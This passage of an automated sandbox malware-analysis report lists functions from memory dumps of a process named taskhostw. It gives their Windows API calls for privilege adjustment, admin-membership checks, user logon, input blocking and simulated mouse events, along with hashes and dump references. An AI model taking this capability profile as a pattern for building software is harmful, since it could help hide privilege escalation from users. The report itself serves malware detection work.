SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00D5B476

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: dfcd34cbe287d4acc684d9cb492dec869d03a2e55ea24def4a6bfcb3533adb97
Instruction ID: cedb1d0cbda5e658a3d260ed4ede8816ef7a372cbe8cc0e9184774c9915abfd0
Opcode Fuzzy Hash: dfcd34cbe287d4acc684d9cb492dec869d03a2e55ea24def4a6bfcb3533adb97
Instruction Fuzzy Hash: 85216035A00618EFCF00EFA5D880AADBBB8FF49314F1480A9E905EB361DB319955DB61

Function 00D48AA3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00D10F36: std::exception::exception.LIBCMT ref: 00D10F6C
Part of subcall function 00D10F36: __CxxThrowException@8.LIBCMT ref: 00D10F81

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D48AED
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D48B1A
GetLastError.KERNEL32 ref: 00D48B27

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: acb4883b284833cd0832a583c0b95346f017dc59e244812c053e7e7db5cace21
Instruction ID: d0ba19096f51193e74508209aeeb89415d7e2e83b839618736a80d691b8a656b
Opcode Fuzzy Hash: acb4883b284833cd0832a583c0b95346f017dc59e244812c053e7e7db5cace21
Instruction Fuzzy Hash: EF116DB1514309AFD728AF54EC86D6BBBADEF44750B20816EF45596241EB70AC81CA70

Function 00D54A08 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00D54A31
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00D54A48
FreeSid.ADVAPI32(?), ref: 00D54A58

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 3d7dc337d42f787058ea31a3889e82708e9e2748a7575b2770e5c2714f052599
Instruction ID: f0362a4ae8cd3571fe3911b7d464e1f46b729fb760a2dace85075c2fcee7c237
Opcode Fuzzy Hash: 3d7dc337d42f787058ea31a3889e82708e9e2748a7575b2770e5c2714f052599
Instruction Fuzzy Hash: F2F04F7595130CBFDF00DFF0DC8AEADBBBCEF08211F004469A905E2281E6705A448B60

Function 02B0720D Relevance: 3.6, APIs: 2, Instructions: 571COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.362011694.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true

Associated: 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.362011694.0000000002B41000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2a80000_taskhostw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 408b997f840a905ffe582337a4dc60593b013503fe809690cd34f803e4a129d4
Instruction ID: 1eb5abf7c07db524691402c784f6998e1df83f33e74177a2fcc49d16e3208266
Opcode Fuzzy Hash: 408b997f840a905ffe582337a4dc60593b013503fe809690cd34f803e4a129d4
Instruction Fuzzy Hash: BB12A171500208AFEB269F24CC88FAEFFA4EF49314F1445A9F516EA1E0DF70A545DB50

Function 00CFE060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4691ef0d4e8fa70804dc1144ab41255a6753463d69e73b0aa15c647e812aac72
Instruction ID: 82d787da2a42f908412269f3e2ed0b51954ab981c32fc486ef56c128bc94c91b
Opcode Fuzzy Hash: 4691ef0d4e8fa70804dc1144ab41255a6753463d69e73b0aa15c647e812aac72
Instruction Fuzzy Hash: 3722B070900219DFDB64DF54C485ABEFBB1FF08310F148069EA569B361E774AE85CBA2

Function 00D5C75D Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00D5C787
FindClose.KERNEL32(00000000), ref: 00D5C7B7

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 757bb2cab8c6269a199b1d2105593c9dd9e3a2d4c946623a9bfde8a0ca58cf41
Instruction ID: 92fcf9dd1b5b20e328fbf3ac026da492f6ada8671422de3a07a3e5f82c8f9d99
Opcode Fuzzy Hash: 757bb2cab8c6269a199b1d2105593c9dd9e3a2d4c946623a9bfde8a0ca58cf41
Instruction Fuzzy Hash: 47118E726102049FDB10DF29C845A2AF7E8EF84324F00851EF9AAD7391DB30AD04DF92

Function 00D5A0F4 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00D6957D,?,00D7FB84,?), ref: 00D5A121
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00D6957D,?,00D7FB84,?), ref: 00D5A133

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: edf5b50d9c99fc4d0dbc0a063f19d23608dd5997cdd8497f0d0514da33dde2ed
Instruction ID: b09596707d91eecea003ad54003a440985debca81ff13ad211da24c9ff899e98
Opcode Fuzzy Hash: edf5b50d9c99fc4d0dbc0a063f19d23608dd5997cdd8497f0d0514da33dde2ed
Instruction Fuzzy Hash: 34F05E3550532DABDB209FA4DC49FEA776CEF08361F008265BD09D6291D6309944CBB1

Function 00D484F3 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00D48631), ref: 00D48508
CloseHandle.KERNEL32(?), ref: 00D4851A

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 317c7472220025152f7158e5082cc8f30314d2ab69a3ee5708c1b829a4e9f6ab
Instruction ID: fd062dc0c246fdefe160e7c11c5101137937289e3b8ddccfc5f21a46212ad2bf
Opcode Fuzzy Hash: 317c7472220025152f7158e5082cc8f30314d2ab69a3ee5708c1b829a4e9f6ab
Instruction Fuzzy Hash: 53E09272014610AEE7352B64EC0AAB77BA9EF443517148829B49A81570EB62ACE1DA70

Function 00D1A2D5 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00D1A2DA
UnhandledExceptionFilter.KERNEL32(?), ref: 00D1A2E3

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 2d526790e9e664b8ed387a827c88c45141237ba5959fb57d00d41d5a3732f0bc
Instruction ID: dc697f6a345c64bfed695e42ef00434664d6c4ae843c2bb8ca6d5b8f1a06acd2
Opcode Fuzzy Hash: 2d526790e9e664b8ed387a827c88c45141237ba5959fb57d00d41d5a3732f0bc
Instruction Fuzzy Hash: 08B09231054308ABCA106B91EC09B883F68EB44AAAF404020F60DC4260EB6254908AA1

Function 00D1F359 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bac98224d9774052532ca012d9f2a6b017df1c58b3944e109b6a8ae9022e0b7
Instruction ID: 2088936158b4fc877d269d398e44bb08c4dbddf189d50fb26d63597194351fa7
Opcode Fuzzy Hash: 0bac98224d9774052532ca012d9f2a6b017df1c58b3944e109b6a8ae9022e0b7
Instruction Fuzzy Hash: B832F231D29F015DD7239634E832335A289AFB63D4F25D737E829B5AA6EF29D4C34210

Function 02AAE759 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.362011694.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true

Associated: 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.362011694.0000000002B41000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2a80000_taskhostw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
Instruction ID: 4feff2e51726acb85539e68de8d8d34c5693a234c81abf7ebbfd6f994318333e
Opcode Fuzzy Hash: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
Instruction Fuzzy Hash: 52322432D29F414DD7239634D972336A288AFB72C8F15D737F81AB69A5EF28D0834204

Function 00D225AE Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05b3952f1eaf585697b7ae1c68fea0782e04d8ad8da8b8f1af74377ddbcce487
Instruction ID: ebf5bda57c5686973c1be81e41ff990740240248aabea9f3f4ef4856789ca69a
Opcode Fuzzy Hash: 05b3952f1eaf585697b7ae1c68fea0782e04d8ad8da8b8f1af74377ddbcce487
Instruction Fuzzy Hash: 94B1D030D3AF514DE62396399831336B65CAFBB6C5F51D71BFC1AB4E22EB2185834241

Function 00D58932 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00D58944

Part of subcall function 00D1537A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00D59017,00000000,?,?,?,?,00D591C8,00000000,?), ref: 00D15383
Part of subcall function 00D1537A: __aulldiv.LIBCMT ref: 00D153A3

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: ca3371e7bb37ad1703362e82f092a5c25469709d54629dbb53c6e23e8be7027d
Instruction ID: 3f0f4c82fe37d0b76a35ed2c533074aee0ddb936e784acc6c27d17950f78ec0a
Opcode Fuzzy Hash: ca3371e7bb37ad1703362e82f092a5c25469709d54629dbb53c6e23e8be7027d
Instruction Fuzzy Hash: 8F21A532625610CBC729CF25D441A51B3E1EBA5311B288F6CD5F6CB2D0CA74B905DF64

Function 00D6401F Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32 ref: 00D6403A

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 23bd502f4de117a3a7a7bfaf5a1dcb0a9e044934663ed0038a4d982a6b2534a1
Instruction ID: c3d06b1ac9ccd2b24ccb67716b5db48a7dbab9c92a6966ed637794534b261fc1
Opcode Fuzzy Hash: 23bd502f4de117a3a7a7bfaf5a1dcb0a9e044934663ed0038a4d982a6b2534a1
Instruction Fuzzy Hash: 31E048312002155FCB209F59D404A5AFBE8EF64760F008015FE4AC7351DA70E8409BA1

Function 00D54CCE Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00D54CF1

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 0a89665f5bf8fdf6469b5bb4fbbd90877287f761dc4f143d46859a476e3b582f
Instruction ID: 6e43839881f617680b1ce0ce1484f3b6bacdaa8f42b2de32dc6e4fc357a55638
Opcode Fuzzy Hash: 0a89665f5bf8fdf6469b5bb4fbbd90877287f761dc4f143d46859a476e3b582f
Instruction Fuzzy Hash: A2D09EAD16274579ED194720DD2FF771108F38078BF985149BD42C91C5EA91ACDC5033

Function 00D48A73 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00D486B1), ref: 00D48A93

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 47601b4ed8b21919e5ec3564442b63d1b7fcb4586c679b456a9c330bab32e326
Instruction ID: 9b51f060423ddf41600b7fa77634a87d0830fa38a334fcf46b67b6a5aae66ea3
Opcode Fuzzy Hash: 47601b4ed8b21919e5ec3564442b63d1b7fcb4586c679b456a9c330bab32e326
Instruction Fuzzy Hash: C4D05E3226460EABEF018FA4DC02EAE3B69EB04B01F408111FE15C61A1C775D835AB60

Function 00D3215F Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00D32171

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 984c6d2ab5d3e6a81f7c1fe0af46060bcf3be7504b42d416719561afe5226d34
Instruction ID: afe423f7148bc3b46b64c0c90830bf20054f834eebf7ab39a5aae48f3e98377d
Opcode Fuzzy Hash: 984c6d2ab5d3e6a81f7c1fe0af46060bcf3be7504b42d416719561afe5226d34
Instruction Fuzzy Hash: 2CC04CF5801109DBCB15DB90D998DEEB7BCAB04315F104055A145F2200D7749B448B71

Function 00D1A2A4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00D1A2AA

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 6fe7d36ee52c0c3d721e324024bf3be8bb32af56abcd772a9357ed27a2c3c035
Instruction ID: cd70fc7f9d16cb8ce214b9198ccdd1c9706b02a52119ad28622f986b3f6c793b
Opcode Fuzzy Hash: 6fe7d36ee52c0c3d721e324024bf3be8bb32af56abcd772a9357ed27a2c3c035
Instruction Fuzzy Hash: A2A0123000020CA78A001B41EC044447F5CD7001947004020F40C80121973254504990

Function 00D08968 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a53fbae6a0c4f4c08af9b6ed9ddbefd2a52c6d66ba02a54099d5bccef5b616
Instruction ID: 59b9295dbb56478fcc03232706f8181ca5f8cfe2ad2693aa5bbc1b097869adb5
Opcode Fuzzy Hash: b4a53fbae6a0c4f4c08af9b6ed9ddbefd2a52c6d66ba02a54099d5bccef5b616
Instruction Fuzzy Hash: D12203716006568BDF288E29D49477CB7A1FB01304F6C806AD8DA9B5EBDB34DD81EB70

Function 02A80687 Relevance: .4, Instructions: 379COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.362011694.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true

Associated: 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.362011694.0000000002B41000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2a80000_taskhostw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b075de1fa2b3c0403cd088eb130ff7c5bcb26e217d8e657d172666baa058c19f
Instruction ID: 968bb10d510a40b45746eb0a5c387a3e278ef1e5dc099c1dacbd12073689a7b8
Opcode Fuzzy Hash: b075de1fa2b3c0403cd088eb130ff7c5bcb26e217d8e657d172666baa058c19f
Instruction Fuzzy Hash: 94A126B2124514BEE72ABB288CC8EBF396EEF41308F04451AF442D6192DF259945CFB5

Function 00D12345 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: a8898a67daf1bf095a6fe2f663be574fba25e2210d81ad3f2cc61d924ae0d245
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: AFC181372050931ADF2D4679A4740BEBEA25EA27B231E075DE8B2CB0D5EF21C5B5D630

Function 00D1277A Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
